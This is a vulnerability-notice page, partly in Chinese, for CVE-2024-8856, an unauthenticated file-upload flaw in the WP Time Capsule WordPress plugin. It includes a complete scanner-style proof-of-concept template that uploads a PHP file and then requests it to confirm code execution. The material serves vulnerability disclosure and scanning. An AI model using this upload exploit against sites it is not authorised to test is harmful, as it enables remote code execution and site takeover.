CVE-2024-8856: WP Time Capsule Plugin - Remote Code Execution

日期: 2025-08-01 | 影响软件: WP Time Capsule Plugin | POC: 已公开

漏洞描述

The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the the UploadHandler.php file and no direct file access prevention in all versions up to, and including, 1.22.21. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

PoC代码[已公开]

id: CVE-2024-8856

info:
  name: WP Time Capsule Plugin - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the the UploadHandler.php file and no direct file access prevention in all versions up to, and including, 1.22.21. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
  reference:
    - https://hacked.be/posts/CVE-2024-8856
    - https://plugins.trac.wordpress.org/browser/wp-time-capsule/trunk/wp-tcapsule-bridge/upload/php/UploadHandler.php
    - https://plugins.trac.wordpress.org/changeset/3188325/
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3153289%40wp-time-capsule&new=3153289%40wp-time-capsule&sfp_email=&sfph_mail=
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/fdc2de78-5601-461f-b2f0-c80b592ccb1b?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8856
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8856
    cwe-id: CWE-434
    epss-score: 0.91953
    epss-percentile: 0.99688
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/wp-content/plugins/wp-time-capsule/"
    publicwww-query: "/wp-content/plugins/wp-time-capsule/"
  tags: cve,cve2024,intrusive,file-upload,wordpress,wp-plugin,wp,wp-time-capsule,rce,vkev

variables:
  marker: "{{randstr}}"
  filename: "{{randbase(2)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=---------------------------26670583928903275361770089688

        -----------------------------26670583928903275361770089688
        Content-Disposition: form-data; name="files"; filename="{{filename}}.php"
        Content-Type: text/php

        <?php echo base64_decode("{{base64(marker)}}"); ?>
        -----------------------------26670583928903275361770089688--

    matchers:
      - type: word
        part: body
        words:
          - 'url":"'
          - '"files":'
          - '"deleteType":'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/files/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{marker}}"
# digest: 4b0a004830460221009a748a6d118bea0348b9af61b88d48c299cd3be7ee8c8758847feec420e8a55702210088d17e153135e344cb8f55fb1b9d7ee4767aaf5e73f0445bcb427b576e2d3cef:922c64590222798bb761d5b6d8e72950

相关漏洞推荐